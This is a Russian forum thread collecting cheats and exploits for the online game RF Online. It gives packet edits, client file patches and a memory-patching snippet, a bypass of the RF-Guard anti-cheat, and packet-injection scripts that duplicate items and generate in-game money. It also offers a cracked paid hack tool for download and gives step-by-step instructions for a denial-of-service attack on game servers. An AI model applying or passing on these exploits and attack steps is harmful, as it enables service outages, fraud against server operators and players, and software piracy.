[MORE=\"2000\"]Размер пакета.[/MORE][MORE=\"010A\"]ID пакета.[/MORE][MORE=\"02\"]Слот персонажа.[/MORE][MORE=\"6173646600000000000000000000000000\"]Ник персонажа. В данном случае - asdf.[/MORE][MORE=\"04\"]Пол персонажа. Здесь - Accretia Male.[/MORE][MORE=\"41\"]Раса. 41, 42, 43 = A, B, C = Accretia, Bellato, Cora.[/MORE][MORE=\"52\"]Класс. В этом пакете - стрелок.[/MORE][MORE=\"4230\"]Специализация. Кстати, в этом направлении я ещё не рыл.[/MORE][MORE=\"00\"]Нульбайт.[/MORE][MORE=\"44\"]Скин ног и тела.[/MORE][MORE=\"44\"]Руки и ступни.[/MORE][MORE=\"44\"]Голова и лицо[/MORE][MORE=\"00\"]Нульбайт[/MORE]


Отсутствие скина:

Последние байты \"444444\" можно, к примеру, заменить на 666666. Тогда персонаж будет невидимым, пока не оденет броню или не войдёт в боевой режим с оружием в руках.
Польза - фан. Не больше.

Отсутствие ника:

Да, я не ошибся. Не \"невидимый ник\", а именно его отсутствие. Невидимый ник пофикшен. Но суть та же.
Вместо ника просто ставим байты \"00\". Если не получится, то замените второй байт ника, к примеру, на \"01\". С одним нулём вроде не создаётся. Второй байт отображаться и даже присутствовать в нике не будет. Если у вас никак не получается создать персонажа без ника, значит такой уже на сервере есть (хотя хз, как сверяется, ника же нет). На Сайдоне можете не пытаться создать
Польза - невозможность забанить такого чара обычным ГМом. Нужен доступ к базе. Ну и, конечно, фан.

Вот, кстати, ещё фишка с отсутствием ника.

Так как у чара нет ника, он не отправляется вместе с сообщением в чат. Если убрать ещё и сообщение, то отправляется, буквально, \"ничего\". Однако, в ответ от сервера приходит всякий мусор. Привет от корейцев, короче.
Т.е., отправлять надо пакет \"04000202\".



P.S: Писал тему часа три Комп два раза вырубался из-за дохлого БП.
P.P.S: Так и не понял, как в 2.2.3 писать на карту, sell, buy чат. шли у меня одного глюк, что не работает также, как раньше?

[color="#092#666686#092"]Добавлено через 14 часов 10 минут[/color]
Ах-да, забыл сказать. Пашет на РУОфе.

Две подсказки: Скрытность и распечатка (2.2.3)

Скрытность:

Подходим к клеру, жмем задание, он дает квест за который дают вознаграждение - Плащ-невидимка

Сдаете, но следующий квест не делаем! Плащ дается на время.
Время кончилось - плащ пропадает

Сдаем квест по новой и так до бесконечности

Полезно чтобы добежать до торговца на элане, квестовых мобов, найти куб в гч и.т.п


Распечатка:

Вы 50 лвл, чтоб не проходить распечатку - проходим просто любой квест, за который дают вознаграждение в в виде опыта

Баг был найден на сервере рфгенесис. Поэтому просьба проверить на других серверах 2.2.3
[/hide]
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Скрытый предмет rfonline.ru

У героя в ГШ кор есть некий скрытый предмет, который купить можно только пакетом. Предмет там точно есть, он находится в первом \"пустом\" слоте.
К сожаленюи 20кк не хватило чтобы купить его, может он за платину продаётся.

Правим Item.edf делаем передаваемой любую вещь

Кароче начнём.
нам нужно [color="#092DarkOrange#092"]data.edit[/color], [color="#092SandyBrown#092"]структура[/color], [color="#092Orange#092"]Item[/color] и сам [color="#092Wheat#092"]Item.edf[/color]
[color="#092YellowGreen#092"]================================================== =====[/color]
data.edit структура
[color="#092#9acd32#092"]================================================== =====[/color]
[color="#092YellowGreen#092"]Открываем Дата эдит:[/color]
f93b50227a98.png

Грузим структурку сворачиваем дат едит. Берём итем и переводим его в дат тоесть тыкаем левой кнопкой мыши по итему и открываем с помощью EdfDeCrypt появится 2ой файлик итем формата дат. Разворачиваем дат едит и грузим итем.
[color="#092YellowGreen#092"]================================================== =====[/color]
Выбераем что нам нужно, для примера [color="#092YellowGreen#092"]Booty[/color] так как там больше всего предметов.


[color="#092YellowGreen#092"]================================================== =====[/color]
шдём в низ ищем например Духовно считывающие устройство, выделеное красным вмето \"0\" пишем \"1\"

Ну вот и всё впринципе, осталось ещё немного.
[color="#092YellowGreen#092"]================================================== =====[/color]
Закрываем и сохраняем изменения, теперь берём итем наш такорый редактировали и открываем его с помощью EdfCrypt.
Появляется файлик Item.dat.edf переименовываем его в Item.edf и пихаем в папку с игрой в Data Table заменяем его.

[color="#092YellowGreen#092"]Аналогично и с остальным.[/color]

Прога

Не нашёл другого места, где бы можно было задать вопрос именно знающим людям)

Нужна прога, которая может искать различия в файлах, жду вашей помощи)

UltraEdit, alt+F11 :agreed:

Пьем банки других рас

Оказывается,ограничение на использование банок стоит в клиенте, теперь как его снять:

1) Распаковываем Item.edf

2) Правим байт принадлежности, вот кусок начиная с названия вещи и до конца, который показывает вещь, красным выделен байт привязки к расе, кстати у всех вещей он разный

Сам код допинга из Item.dat представлен на скрине, красным выделен байт расы. Чтобы к примеру акр смог глотать коровские допинги необходимо сменить байт расы на 42 и аналогично для других

3) Криптуем фаил обратно в Item.edf

4) Отключаем автообновление и пихаем в папку Data Table в корневом каталоге игры

5) Радуемся

Главное не забывайте, что допинг пьете другой расы и соответственно анимация рисуется другая. Не палимся вообщем

Скрин кода допинга:
i-2.jpg

Прокачка умений

Если поймать пакет на селф-баф умении, и отправлять его, то это умение будет прокачиваться.

Если просто тыкать по умению в клиенте, то будет говорить, что можно бафать только тогда, когда действие бафа подходит к концу (1/10 от времени).

А так можно каждые 200-1000мс (задержка - время каста умения. шногда бывает дольше, почему - фз) прокачивать умение.

[color="#092#666686#092"]Добавлено через 16 часов 22 минуты[/color]
P.S: Пашет на РУОфе.

Описание пакетов 6602 и 6603

Те, кто занимаются исследованием пакетов, наверное, заметили постоянную передачу пакетов типа 6602 и 6603 клиентом серверу и наоборот, при этом складывается такое ощущение, что их содержимое абсолютно рандомно. В этой статье я хочу рассказать, что это за пакеты и как они генерируются.
Предположим, сервер нам прислал пакет:
0x00 | 14 00 66 02 5d 14 55 0c 56 6e e7 15 11 23 19 10
0x10 | 35 43 14 55

Соответственно, в ответ на него нам нужно сгенерить и отправить 6603 пакет. Посмотрим, как это делает сервер:

Код:
sub_68EEB0 proc near
 
	  arg_0= dword ptr  4
 
	  mov	 ecx, [esp+arg_0]		// ecx содержит адрес 16 байт серверного пакета
   push	esi
   mov	 eax, [ecx+8]		 // в eax записываем с 8-го по 12-ый байт пакета - 0x10192311
   mov	 edx, [ecx+0Ch]		 // в edx записываем последние 4 байт пакета - 0x55144335
   mov	 esi, [ecx+4]		// в esi с 4-го по 8-ой - 0x15e76e56
   sub	 eax, edx			// Вычитаем из eax edx: eax = eax - edx = 0xBB04DFDC
   mov	 edx, [ecx]			// в edx записываем первые 4 байта пакета - 0x0c55145d
   sub	 eax, esi			// eax = eax - esi = 0xA51D7186
   add	 eax, edx			// eax = eax + edx = 0xA51D7186 + 0x0c55145d = 0xB17285E3
   mov	 edx, dword_8052C8		// в edx записывается - 0x12AB34CC (константа)
   imul	edx, eax			// edx = edx*eax = 0x0F15CCE4
   // в edx оказывается ключ, которым дальше ксорится серверный пакет. Результирующие данные
   // будут отправлены серверу пакетом 6603.
   mov	 eax, offset unk_12A4C2C
   sub	 ecx, eax
   // Далее цикл как раз ксорит каждые 4 байта пакета по вывчисленному ключу.
   // eax - счётчик, который с каждой итерацией увеличивается на 4, и так до 16.
   / mov	 esi, [ecx+eax]		// в esi первые 4 байта пакета
   | add	 eax, 4			// увеличиваем счётчик на 4
   | xor	 esi, edx			// Ксорим первые 4 байта пакета ключом, вычисленном вначале:
				   // esi = esi ^ edx = 0x340D8B9
   | cmp	 eax, offset unk_12A4C3C	 // проверяем равен ли счётчик 16
   | mov	 [eax-4], esi		// Записываем ксоренное число по адресу начала пакета
   \\ jl	  short loc_68EED6
В итоге, после 4-ёх таких итерацией, получившиеся данные примут вид:
b9 d8 40 03 b2 a2 f2 1a f5 ef 0c 1f d1 8f 01 5a

ш далее вот такой пакет будет отправлен серверу:
0x00 | 14 00 66 03 b9 d8 40 03 b2 a2 f2 1a f5 ef 0c 1f
0x10 | d1 8f 01 5a
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Зеленка и допы для всех rfonline.ru

суть бага в том что можно трескать допы абсолютно любой расы, в том числе и зеленку

пример: допустим мы играем за расу кора, соответсвенно нас интересуют акробелковские доп которые валятся с чипа(те же 40 атк\\дефа) или зеленка, которой у кор вообще нету кроме шоп

для зеленки
лезем в Item.edf ищем Стихийный восстановитель т.к. он акровский то ищем число 42 их там обычно одно или 2(можно оба поменять страшного ничего не будет(40 изначально идет для расы акретия, 70 для белок, 80 коры) 42 меняем на 82 сохраняем заходим и радуемся зеленке) с допами ситуация аналогичная

Коры 82
Белки 72
Акры 42
работает на рфонлайн.ру



на картинке пример переделанной зеленки под кор

Брутфорс NovusGalaxy
Собственно брут. шнфа на рфчитс под хайдом в 300 постаф :notme:



Создаём свой лоадер

[hide="25"]
штак, вопросы выбора языка программирования, сокетных библиотек и т.п. осуждаться не будут, ибо на вкус и цвет все фломастеры разные. А обсуждаться будут 2 наиболее интересных момента написании лоадера

штак, по шагам:

1. Коннектимся с сервером авторизации

2. - Отсылаем пакет на запрос ключей для шифрования логина/пароля

05 00 15 0C FF
- Получаем ответ от сервера с ключами :
07 00 15 0D 04 A4 03
где :
04 = PlusKey
A4 = XORKey
Дальше идёт корейский мега-ход-конём =))
PlusKey = PlusKey + 1
XORKey = XORKey + 3

3. Шифруем логин и пароль, отправляем их серверу.

Строки логина и пароля по длине (maxPasswordLength) = 12 символов. Корейцы добавляют один про запас. Таким образом алгоритм шифрования, на примере пароля выгладит так :

for i := 1 to maxPasswordLength + 1 do
begin
if i <= length(aPassword) then aByte := ord(aPassword) else aByte := 0;
aByte := aByte + aPlusKey;
aByte := aByte xor aXORKey;
end;
Добавляем завершающий 00 и в итоге пакет принимает вид :
1F 00 15 03 XX XX XX XX XX XX XX XX XX XX XX XX XX YY YY YY YY YY YY YY YY YY YY YY YY YY 00
где :
XX XX XX XX XX XX XX XX XX XX XX XX XX и
YY YY YY YY YY YY YY YY YY YY YY YY YY
соотсветственно зашифрованные логи и пароль.

4. Получаем и разбираем ответ сервера

0E 00 15 04 AA XX XX XX XX 01 00 00 00 00
здесь :
AA - Код резльтата (0x00 - всё норм, 0x06 - неверный логин или пасс)
XX XX XX XX - ID аккаунта
00 01 00 00 00 - Признак премиума (1 = премиум, другое значение - нет)

5. Посылаем запрос на список игровых серверов

08 00 15 05 00 00 00 00

6. Разбираем ответы

- список серверов
30 00 15 06 AA 29 00 05 01 06 54 72 69 61 6E 00 01 04 41 73 75 00 01 07 41 6E 6F 6D 69 61 00 01 06 4E 6F 76 75 73 00 01 07 46 61 6C 67 6F 6E 00
здесь :
AA - Код резльтата (0x00 - всё норм, другие не попадались)
29 00 - Количество оставшихся байт в пакете
05 - Количество серверов в пакете
01 06 54 72 69 61 6E 00 - запись об одном сервере :
01 - Включён / отключён
06 54 72 69 61 6E - навзание сервера
00 - Завершающий 0x00

- нагруженность серверов
0F 00 15 42 05 01 00 01 00 01 00 01 00 01 00 где :
05 - количество серверов, по которым идут данные

01 00 - состояние сервера (00 - Normal, 01 - Busy)

- назначение этого пакета осталось для меня загадкой
0A 00 15 43 05 00 00 00 00 00

таким образом все полученные сревера нужно разместить в список или массив, индексы в котором начинаются с нуля.

7. Посылаем запрос на подключение к желаемому серверу

06 00 15 07 02 00, здесь :
02 - порядковый номер сервера в списке (считая от нуля)

8. Разбираем ответ

33 00 15 08 00 59 F9 12 8C 84 6C 09 20 C0 B8 C4 00 15 CD F7 AE 7E FD 2B EC B0 32 8B 0C 00 96 3B 5D 07 30 B7 87 5F 43 BB 35 45 15 25 B3 CD 11 64 4B FA 40
где :
00 - Код результата операции
59 F9 12 8C - IP сервера
84 6C - Порт сервера
Дальше идёт ключ сессии, разобьём его на DWORD\'ы, далее будет понятно, зачем =)
09 20 C0 B8 (0)
C4 00 15 CD (1)
F7 AE 7E FD (2)
2B EC B0 32 (3)
8B 0C 00 96 (4)
3B 5D 07 30 (5)
B7 87 5F 43 (6)
BB 35 45 15 (7)
25 B3 CD 11 (8)
64 4B FA 40 (9)

На этом с общением с сервером авторизации - всё.



2. Создание файла defaultset.tmp, так необходимого клиенту
файл <GameDir>/System/DefaultSet.tmp необходим клиенту (rf_online.bin) для того, чтобы подружиться с сервером. Строится он очень просто из следующих составляющих :

+ IP сервера XOR 0xCB9C4B3A
+ Порт сервера XOR 0x4FB6
+ 13 байт логина игрока без \"шифрования\"
+ AccountID XOR 0x6E65E0AF (из пакета 1504)
+ сервера XOR 0xCB9C4B3A
+ Session key (5) XOR 0xCFCF22E6 (из пакета 1508)
+ Session key (3) XOR 0x5BBCDE6F (из пакета 1508)
+ Session key (7) XOR 0xACDF5EDA (из пакета 1508)
+ Session key (1) XOR 0xBCCD1B37 (из пакета 1508)
+ Порядковый номер выбранного сервера XOR 0x4B3A
+ AccountID XOR 0xC89C183A (из пакета 1504)
+ Premium Flag XOR 0xC89C183A (из пакета 1504)

Вот это и будут заветные 49 байт, которых так не хватает клиенту.
После создания файла можно пулять клиентский бинарник rf_online.bin

Ну, и для того, чтобы расставить все точеи на Ё - как запретить клиенту проверять наличие своей копии в памяти


Для этого всего лишь нужно подправить один jump, чтобы он просто миновал процедуру проверки. В дельфёвом коде это выглядит как :

var
bytesread : dword;
addrSingleInstCheck : dword = $006a56c4;
patchSingleInstCheck : word = $5F75;
....
WriteProcessMemory(ProcessID, pointer(addrSingleInstCheck), @patchSingleInstCheck, sizeof(patchSingleInstCheck), bytesread);

Обход защиты RF-Guard

Обход защиты RF-Guard',1241842282,'Вижу тут не один раз обсуждались обходы защиты RF Guard.
Но такого способа каким пользовался я, сдесь не увидел.
ш я думаю он наиболее простой и намного лучше остальных, так как его нужно выполнить всего лишь раз.

Мысль о таком способе у меня возникла сразу же, как я прочитал на сайте разработчика принцип этой защиты. А принцип заключается в следующем: сама программа RF Guard (которая ищет окна по заголовкак и классам окна, а зетем убивает занесенные в \"черный список\") склеивается джойнерами с экзешником лаунчера RF. A затем все это дело в виде нового патча впаривается юзеру. Так вот идея у меня возникла следующая: если две программы были склеены, то следовательно их можно расклеить.
Стал я думать как же расклеить два файла. Скачал рекомендуемые автором защиты склейщики посмотрел покрутил и решил погуглить вдруг существуют уже готовые программы для расклейки. Но я ничего не нашел. Хотел было уже изучать алгоритм склейки и писать расклейщик, но меня это не вдохновило, так как склейщиков очень много и писать для каждого расклейщик, что-то мне не улыбалось. Но всетаки способ я нашел и он оказался очень простым. Сейчас на примере патча для Thunder-pvp(прим. патч у меня старый, так как я не играю, но для примера пойдет) я покажу как расклеить лаунчер с защитой RF Guard, лаунчер оставить и скопировать в папку с играй, а защиту отправить в трэш!

штак начнем:

На первом скрине мы видем лаунчер игры, кликаем на нем два раза.



итак интересующие нас процессы показаны на следубщем скрине:



Если у вас виндовс виста то эту защиту видно в диспетчере задач и ее процесс можно спокойно завершить.



но этот способ не для нас мы пойдем другим путем. =)

А теперь подумаем как же работает склейщик. Он склеивает два(или более) файлов в один \"контейнер\". Затем при запуске этого \"контейнера\" ему нужно эти файлы как то запустить, для этого ему нужно их извлечь либо сразу в оперативную память и выполнять отуда, либо извлечь на жесткий диск. Конечно же удем надеятся на лучшее.
На процессе лаунчера кликаем правой кнопкой мыши и выбираем пункт свойства.



ш о боже! Что же мы видим а видим мы в поле размещение следующее:



это и есть чистый лаунчер без всяких защит да и при том запущенный из папки темп.
Далее переходим в папку темп



и наблюдаем что там находятся и эта самая защита и лаунчер.
Все дело сделано берем лаунчер кидаем в папку с игрой и пользуемся навсегда забыв про RF Guard!



По ходу написания этого гайда я обнаружил еще один способ отключения защиты:
При ее запуске с отключенным инетом она начитает подвисать(из за того что не может получить доступ в инет) и курсор превращается в песочные часы.



Мы щелкаем несколько раз по окну защиты и потом просто завершаем процесс



а лаунчер остается работать


далее мы спокойно подрубаемся к инету и играем в свое удовольствие. А защита опять улетела в трэш!
Существует еще 1000 и один способ послать эту защиту но думаю рассказывать нет смысла, так как первый способ наиболее простой и выгодный.

штак подведем итоги для обхода защиты достаточно просто запустить лаунчер(то есть \"контейнер\" в котором находится защита и сам лаунчер) он распакует нужные(и не нужные =)) нам файлы в папку темп откуда мы из спокойно забираем. Что бы узнать где у вас находится папка темп просто в строке адреса пишем %TEMP% и жмем ENTER и мы переходим в эту папку.



Так же я провел тест джойнеров которыми автор защиты предлагает склеивать файлы.
FreeJoiner.exe и N-Joy.exe работают по одному и тому же принципу - распаковывают файлы в папку темп. Склеить файлы Net_Joiner_1.0.exe\'ом мне не удолось. Но думаю с ниб дела обстоят так же ка и с двумя другими. Результаты тестов находятся в архиве:

Список файлов:
FreeJoiner.exe - Джойнер
Net_Joiner_1.0.exe - Джойнер
N-Joy.exe - Джойнер
1.exe - программа для теста склейки
2.exe - программа для теста склейки
!FreeJoiner.exe - программы склеенные FreeJoiner\'ром
!N-Joy.exe - программы склеенные N-Joy\'ем

Вот думаю и все что я хотел рассказать об обходе так называемой защиты, думаю информация будет полезна многим. Если есть вопросы пишите.

© Тигрь!

P.S. Поздравляю всех форумчан с Днем Победы!!!
[/hide]
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
PvpWar играем с допами.

В дропе с премиум коробок появились -зелья на использование 2-х допингов сразу.

Зелье очень хорошее, и дает нам возможность использовать 2 допинга, правда дающие бонус разным показателям.

Однако возможно и выпить сразу 2 допинга дающие бонус к 1-му показателю.

Пример 2 допов на атаку точность:

кушаем зелье на 2 допинга.

затем юзаем зелье на атаку и на зелье на точность ( которое дает бонус только к точности) затем юзаем зелье на атак\\точность и вуаля. он у нас встает вместо допинга на точность в итоге мы имеем + 90 атаки с допов (55+35) и еще +35 точности, неплохо да?



Таким же методом можно действовать и с другими допингами на другие свойства.



Согласитесь +35 атаки, либо + 35 точности


Для белкострелков можно вообще жестко спамить скиллами при их бафе на уменьшение отката скилла и с 2-мя допами на уменьшение отката


тыкаем спасибу)

Добавлено через 8 минут
ЗЫ при использовании 2-х зелий на уменьшение перезарядки мой акрет стрелял учеником лукаря раз в 2 секунды, т.е. по кд можно сразу же стрелять снова. У белкострелка с такими допами можно вообще мутить жесткие комбо)

Добавлено через 37 минут
еще если выпить пот на точность, затем на атаку а затем на атаку\\точность и после этого выпить пот на атаку - то получим +110 атаки чисто от допов) юхууу)


правда после этих манипуляций оба допа слетают

Добавлено через 41 минуту
еще если выпить пот на точность, затем на атаку а затем на атаку\\точность и после этого выпить пот на атаку - то получим +110 атаки чисто от допов) юхууу)


правда после этих манипуляций оба допа слетают

Project One (RFO) - Hacked by Тигрь!

Эксклюзив

Представляю вашему вниманию взломанную мной программу «Project One (RFO)».
Версия 1042 (последняя которую нашел на своем винте) если есть новее сообщите.

Теперь программа просто запускаестя и нормально работает.

Описание:
В данной версии реализовано:

Все серверы:
+ Откат банок HP и FP вы можете ставить сами.
+ Можно установить точки возраждения и аукционн где его раньше не было.
+ У всех турелей можно выставить ограничение по лвлу на 30.
+ У всех мин и ловушек можно выставить ограничение по лвлу на 30.
+ Отключение АвтоОбновления. (rfonline.ru и novusgalaxy.com)
+ Патч на 2 окна.
+ SpeedHack, WallHack, ZoomHack (на всех серверах)
+ Скриптмеикер (для ботоводов).
+ Передача непередоваемого
(Shop - Кольцо и амулет Новичка, АвтоАБУ+батареи, Капсула смены специализации, шзумруды шзобилия и Утешения, Боеприпасы, Пустые коробки (мал,мред,больш), Алый и Голубой камень, Части Леона, ТП в Краги, Модификаторы и особенности для стринт брони, Реликтовая Броня Представителей Расы)
+ Быстрый выход из игры (ForceLogOut)
+ Баф-Дебаф можно исппользовать любым оружием + Увилечение дистанции
+ Увилечние скорости атаки:
Кинжал: бел+инт (1-55лвл), Стринт (40-50лвл), Леон, Реликт
Двуручный Меч: бел+инт (30-55лвл), Стринт (40-50лвл), Реликт
Копье: бел+инт (35-55лвл), Стринт (40-50лвл), Леон, Реликт
Лук : бел+инт (35-55лвл), Стринт (40-50лвл), Леон, Реликт
Огнестрел: бел+инт (35-55лвл), Стринт (40-50лвл), Леон, Реликт
ПУ : бел+инт (30-55лвл), Стринт (40-50лвл), Леон, Реликт
Метательное: бел (5-55лвл)
+ Макросы (только в активном окне)
+ RFGuardKill = убийство защиты сервера (RF Guard)
+ FlyRunHack - бегаем по воздуху
+ ЧатХак (смена ника и звания)
+ Убираем дождь в Горах Чудовищ
+ Увеличиваем скорость атаки Воинов за счет снятия штрафов на бронь ББ
+ Lvl Hack (изменение уровня в клиенте)
+ AttackSpeedHack (он же OverDamage x10, он же DamageHack) в игре
+ BoostJade Hack:
- Обычный, Скоростной, Сверхскоростной Радар можно юзать на 1 лвле (спс CoMoToZa)
+ Банк-Хаки: (одеваем через банк, где не пофиксели !!!)
- Осадку (на выбор) можно сделать амулом или кольцом и одеть ее.
- Стихийные кольца и амулы сделаны для Любой расы. (можно юзать стихийки другой расы)
+ Теперь в AttackSpeedHack можно выбирать тип урона !!!
+ DamageHack !!!
+ MauSpeed !!! (Балиста)
+ Новый интерфейс !!!
+ Новая защита !!!

ПВП серверы: (НЕ РАБОТАЮТ на rfonline.ru)
+ Добавлены два нужных скрытых скилла(баффа) это Демаскировка и Оглушающий удар.
+ CashShopHack = Хак Шопа по горячей клавише (ПВП Серверы) (кто не знает что это - смотрим ниже видео)
+ BoostJade Hack:
- Осадной Набор одеваем на 35(40), 45(50), 50(55) лвле
- Антиграв одеваем на 35(40) и 45(50) лвле
- Броню одеваем на 45(50), 50(55) и 55(60) лвле
- Оружие берем на 45(50) и 50(55) лвле (A,B,C,Leon)

+ Прога имеет возможность переключать язык интерфейса - русский и английский
+ Функция полуавтоматическое «АвтоОбновление программы»

Поддерживает серверы:
rfonline.ru (RF_Online.bin 5.05 mb)
relax-rf.com
warzone51.ru
game.iptel.by (RF_Online.bin 5.01 mb)
novuswars.com (RF_Online.bin 5.05 mb)
novusgalaxy.com (RF_Online.bin 5.01 mb)
rf.egame.lv
rf-galactica.com
rfo.in.ua (RF_Online.bin 5.05 mb)v
pvpworld.ru (SpeedHack, WallHack, ZoomHack, Скриптмеикер, Быстрый выход из игры, FlyRun (бегаем по воздуху), ЧатХак (смена ника ))


ProjectOne_v.1042_Hacked_by_TurPb.rar


Данная версия распространяется только для ознакомления! После ознакомления с программой вы должны ее удалить и приобрести программу у авторов.

Официальная страница где вы можете приобрести программу:


P.S. хаки которые изменяют EDF работают точно
те которые изменяют память - не уверен.
Кто нибудь протестируйте. Если не работают буду переделывать.

Роняем фришки - дос атака на сервер

Скачиваем программу DOSataker
Ссылки на неё тут:



Ставим фаерволл, без разницы какой, главное чтобы показывал сетевую активность. Например Outpost 2009

Затем выбираем, который сервер хотим задосить, скачиваем патч сервера и заходим на сервер

Через аутпост (например) смотрим айпи и порт этого сервера, открываем нашего атакера и в поле URL для атаки вбиваем айпи
В поле Порт - вбиваем порт сервера. Потоки желательно выбрать 2

Если вы хотите не показывать свой реальный айпи, то нажимаем на галку шспользовать Сокс. Далее айпи и порт для прокси можно узнать тут:
их можно купить, а можно взять бесплатно

После этого жмём Start и смотрим онлайн атакованного сервера!

Усиление мили-дамага на 20% (2.2.1)

Баг из закрытого раздела рфчитс, спасибо говорим Marinko

штак, в 2.2.1 апе и старше появились улучшенные патроны по 1000 штук в пачке

Особенность этих патронов в том, что они усиливают базу оружия при расчете повреждений

Суть бага в том, чтобы использовать именно их для «стрельбы» из милишного оружия (ищите баг на форуме).

По эффекту получается как будто база оружия возросла на 15-20%. Ну, или как будто вы получили лампу атаки. (Можно сказать, что 55 инт копа превращается в душегуб)

ш все это без учета того, что стихийность вашего оружия в итоге тоже учтется (если речь не о пвп, а каче-фарме)

Да, используйте улучшенные патроны со стихийным дамагом, они эффективнее чем бесстихийные

Данный баг наиболее актуален для белок и кор, поскольку:

[ INDENT] 1. У акров есть ракеты, которые дают подобный эффект, а у белок все имеющиеся патроны либо не прибавляют дамаг, либо наоборот - уменьшают (да, оказалось что обычные патроны на, например, лазер - ослабленные, а «улучшенные» обладают базовым дамагом).

2. Белкам и корам сложнее найти ракеты.

3. шспользование белками и корами ракет в слоте амуниции является палевным моментом.[ /INDENT]

Дюп оффы и всего остального.

Товарисчам читерам :
Что нам потребуется?
RF WTF
прога в два окна
клавиатура

Начнём=>
=> Заходим в RFO (желательно в окне, так удобнее)=>
=> Заходим в программу RF WTF
=> затем ищем человека каторому полностью доверяем (либо если у вас 2 компа то заходим 2ым чаром)
=> Кидает обмен тот кто будет дюпать. Договорно 2ой человек должен принять трейд, затем быстро нажимаем в WTF «ZerO Pos» нажимаем сразу замки и принимаем! и СРАЗУЖЕ Жмём кнопку в WTF «Z-» вы жестко зависнете! Тыкаем вперёд (на клавиатуре). ш всё игра окончательно зависла.
=> Через несколько секкунд вы вылетете с ошибкой, вот и всё, входим игру снова и ура нас откатило примерно на 1-1.5 минуты и увас осталось то самое что вы дали другому чару!

ш ещё самое важное, дюпаем на главными пресонажами, т.к. тот персонаж, который зависает, или теряется или им не войдёте в игру.:nono:. Перед тем как дюпать не портуйтесь и не пеедавайте денег.
P.S. На оффе может быть профикшенно, но думаю ещё нет.

Увеличение скорости атаки на ВСЕХ фришках с помощью мяча

[hide="25"]
Работает на фришках, в которых ввели хотя бы какую-то часть 6 апа, в т.ч. и мячики футбольные, итак:
Все знают, что бегать с мячиком и оружием в руках одновременно нельзя. Также все должны знать, что мячик в статах увеличивает скорость атаки. Понимаете к чему я клоню?

Чтобы бежать с оружием и мячиком одновременно - нужно убрать режим атаки (кнопка А), затем одновременно кликнуть по мячику правой кнопкой мыши и на кнопку А на клаве. Мяч и оружие появятся одновременно =) Ура, товарищи! )

Присваиваем щиту св-во [Бег] или к любым другим шмоткам, любое св-во.

Для этого нам понадобится Revolution Engine. Заходим в игру, ищем в RE тот предмет который хотим отредактировать, открываем и редактируем как на изображении ( это вид на фа клиенте)

ш не забываем перевести число из хекса в обычное, на скрине хексовые числа. Когда отредактировали щит на бег, нужно быть в режиме управления мышкой, и нужно кликнуть в любое место карты, затем на бегу одевать щит



Красным отмечено, то какой «Особый эффект у предмета» а синим- это множитель, т.е чем больше множитель, тем больше даст эффекта.

Это можно делать практически с любым итемом. Работает на ФА и на 5 аппе и на оффе

Мобы в текстурах

Практически всех мобов в РФ можно завести в текстуры, особенно лего завести их на гору.

Как это делается точно не смог выяснить, но примерно так:
1) Агрим на себя моба
2) Ведём его до горы или стены
3) Поднимаемся на минимальную высоту, где он не бьёт вас, и включаем ФХ.
4) Все мобы делают «статичные» телодвижения, когда сагрились, выглядит как-будто они бьют кого-то. Встаём около стены над мобом, и как только он «ударит» надо быстро бежать в сторону стены, после чего он побежит на стену за вами.


Применений у этого море, одно из самых полезных, это вывод питов в ците за пределы комнаты. Если вывести моба за пределы комнаты, то сервер считает что его нет, что он убит и автоматом защитывается задание.

Баг на деньги для Warzone

Сам баг технически похож на описанный во 2 Уровне

ш так: Подходим к GM-HERO у него продаются Relict бездырочный, стоимостью 100КК+. нам нужно купить этих шмоток чтобы преодолеть верхнюю границу допустимых значений INT но не выйти за 3ККК.

001A 000000 01 - покупка одного реликта, где 01 - количество

Не смотря на то,что оружие вроде как в стопки не складывается, поставим =1С=28штук(для белок) и отправляем до появления Item Purchais Failed, делаем релог... и о чудо! Все сумки заполнены реликтом

Таким образом пакеты выглядят так:

Для B:
Код:
0C01 0705 001A 000000 1C 001A 000000 1C 001A 000000 1C 001A 000000 1C001A 000000 1C

Для A:
Код:
0C01 3805 001A 000000 1E 001A 000000 1E 001A 000000 1E 001A 000000 1E 001A 000000 1E

Продаем весь реликт, обмениваем деньги на Голды либо в банк и вперед за новой партией

Процесс этот долгий и утомительный, вот 2 скриптика к PPC:

1. Данный скрипт будет отправлять каждые 50мс пакет на покупку 5 реликтов (комментированное для BCC). Запускается и останавливается социальными действием из РФ «помахать»

Код:
if _gAbsNumPkt = 1 then begin
tv:=1;
Dowork:=0;
end;
 
 
if _gFromServ = false then   
  if copy(_gBuff,3,2) = #$0D+#$16 then begin
_gOutBuff := _gBuff;
 
  if copy(_gBuff,5,2) = #$04 then Dowork:=1;
  if copy(_gBuff,5,2) = #$05 then Dowork:=0;
 buf:= HPck(\'020B07024B00750063006800650072000000CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
144B007500630068006500720020003A002000640065006E006500670020006E00650074007500290
00000\',81);	
//  pInt(buf,Attacker,4,4); //	 \'07 00 04 xx xx xx xx\' xx = attaker
  gSys(\'EnSendC\',buf);  // пошлем пакетик.
end;
 
 
 
  if (Dowork <> 0) and gSys(\'Tick\',tv,50) then begin 
//buf2:=HPck(\'0C010705001A0000001C001A0000001C001A0000001C001A0000001C001A0000001C\',34);
buf2:=HPck(\'0C013805001A0000001E001A0000001E001A0000001E001A0000001E001A0000001E\',34);
gSys(\'EnSendS\',buf2);  // пошлем пакетик.
Writelog(\'Работаемс...\');
	end;

2. Данный пакет ждет ответный пакет от покупки из которого вытаскивает айди только что купленный вещей и продает их обратно + сразу идет обмен денег на голды

Код:
if copy(_gBuff,3,2) = #$0C+#$06 then
begin
// Пришел пакет на покупку!!!
//2000 0C02 FA22 7531 0000 0000 00A9 1526 0000 0000 0005 D100 D200 D300 D400 D500
//2000 0C02 85E7 EE23 B78A 2400 80DE 2D1E 0000 0000 0005 E900|EA00|EB00|EC00|ED00
buf:=#$1B+#$00+#$0C+#$04+#$38+#$00+#$05;
//buf:=#$1B+#$00+#$0C+#$04+#$07+#$00+#$05; 
buf:=buf +#$00 + copy(_gBuff,23,2) +#$01; 
 buf:=buf +#$00 + copy(_gBuff,25,2) +#$01; 
